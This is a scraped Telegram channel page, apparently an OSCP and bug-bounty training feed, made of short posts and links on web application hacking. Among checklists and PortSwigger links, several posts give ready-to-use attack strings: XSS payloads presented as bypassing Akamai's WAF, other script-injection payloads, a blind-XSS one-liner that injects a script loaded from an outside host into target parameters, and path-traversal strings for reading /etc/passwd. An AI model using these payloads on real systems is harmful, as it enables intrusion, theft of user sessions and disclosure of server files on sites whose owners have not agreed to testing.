🔥OSCP Training🔥🛡⚔️👨🏻‍💻 – Telegram

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

8.1K subscribers

162 photos

1 video

27 files

64 links

Offensive Security Certified Professional
@WebHacking
@pfsense
@WifiHacking
🔰For safer days

Download Telegram

About

Blog

Apps

Platform

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

8.1K subscribers

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

🔥3👍2❤1

6.7K views15:13

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

🔥7🎉2

10.2K views20:52

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

👍6

7.18K views05:11

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

👍7

7.32K views05:40

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

👍3🤔2

7.57K views20:30

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning

PortSwigger Research

Making HTTP header injection critical via response queue poisoning

HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a

🔥2🎉2👍1

10.4K views20:25

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack#:~:text=specialWordlists.py.-,Command%20line%20usage,-From%20time%20to

PortSwigger Research

Turbo Intruder: Embracing the billion-request attack

Automated web application attacks are terminally limited by the number of HTTP requests they can send. It's impossible to know how many hacks have gone off the rails because you didn't quite manage to

👍7

10.9K views19:34

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Testing Authentication Flaws in Web Application

👍2❤1

11.2K views13:51

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

IDOR Checklist !

👍4

10.8K views19:40

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters

👍4

10.5K views20:10

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Checklist; After Recon

👍9

9.92K views17:29

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Rate Limit Bypass Headers

🔥7❤1

10.2K views04:13

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Pentesting Webapp Checklist for Small scope !

🔥8

6.69K views16:11

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Authentication Testing

6.86K views19:57

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Use this payloads on Email field...

👍1

6.87K views12:27

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

👉🏻 https://xn--r1a.website/bug_bounty_bootcamp

👍2

6.9K views12:28

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

👍4

7.2K views12:31

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Bug Bounty Tips

Sensitive Data Exposure
in ASP•NET apps via /Trace.axd endpoint

👍5

7.74K views14:11

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Upload functionality testing

👏6👍2

8.04K views20:42

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Some filter bypass payload list while hunting for LFi vulnerability

→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd

👍9🎉1

12.6K views03:49